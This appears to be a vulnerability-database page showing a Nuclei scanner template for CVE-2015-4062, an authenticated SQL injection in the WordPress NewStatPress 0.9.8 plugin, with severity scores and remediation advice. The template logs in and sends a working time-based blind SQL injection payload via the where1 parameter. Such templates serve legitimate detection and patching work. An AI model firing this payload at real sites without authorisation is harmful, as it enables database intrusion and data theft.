Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2015-4062
HistoryMar 05, 2023 - 1:42 p.m.

WordPress NewStatPress 0.9.8 - SQL Injection

2023-03-0513:42:10
ProjectDiscovery
github.com
8
cve2015
authenticated
sqli
wp-plugin
newstatpress
packetstorm
wordpress
wp
newstatpress_project

6.5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:S/C:P/I:P/A:P

7.5 High

AI Score

Confidence

Low

0.027 Low

EPSS

Percentile

90.6%

WordPress NewStatPress 0.9.8 plugin contains a SQL injection vulnerability in includes/nsp_search.php. A remote authenticated user can execute arbitrary SQL commands via the where1 parameter in the nsp_search page to wp-admin/admin.php.
id: CVE-2015-4062

info:
  name: WordPress NewStatPress 0.9.8 - SQL Injection
  author: r3Y3r53
  severity: medium
  description: |
    WordPress NewStatPress 0.9.8 plugin contains a SQL injection vulnerability in includes/nsp_search.php. A remote authenticated user can execute arbitrary SQL commands via the where1 parameter in the nsp_search page to wp-admin/admin.php.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage.
  remediation: |
    Update to plugin version 0.9.9 or latest.
  reference:
    - https://packetstormsecurity.com/files/132038/
    - https://wordpress.org/plugins/newstatpress
    - http://packetstormsecurity.com/files/132038/WordPress-NewStatPress-0.9.8-Cross-Site-Scripting-SQL-Injection.html
    - https://nvd.nist.gov/vuln/detail/CVE-2015-4062
    - https://wordpress.org/plugins/newstatpress/changelog/
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:S/C:P/I:P/A:P
    cvss-score: 6.5
    cve-id: CVE-2015-4062
    cwe-id: CWE-89
    epss-score: 0.0272
    epss-percentile: 0.90505
    cpe: cpe:2.3:a:newstatpress_project:newstatpress:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: newstatpress_project
    product: newstatpress
    framework: wordpress
  tags: cve2015,cve,authenticated,sqli,wp-plugin,newstatpress,packetstorm,wordpress,wp,newstatpress_project

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        @timeout: 20s
        GET /wp-admin/admin.php?where1=1+AND+(SELECT+3066+FROM+(SELECT(SLEEP(6)))CEHy)&limitquery=1&searchsubmit=Buscar&page=nsp_search HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'status_code == 200'
          - 'contains(body_2, "newstatpress_page_nsp_search")'
        condition: and
# digest: 490a0046304402206afe631ad8f093e0e82bb2d01736518d96616950971ac077d2ed68d07fc2209b02204867eca23d5337e9b83cb4066ed5a73d791aa434fe9f29e1b1f4762ae55b7368:922c64590222798bb761d5b6d8e72950

6.5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:S/C:P/I:P/A:P

7.5 High

AI Score

Confidence

Low

0.027 Low

EPSS

Percentile

90.6%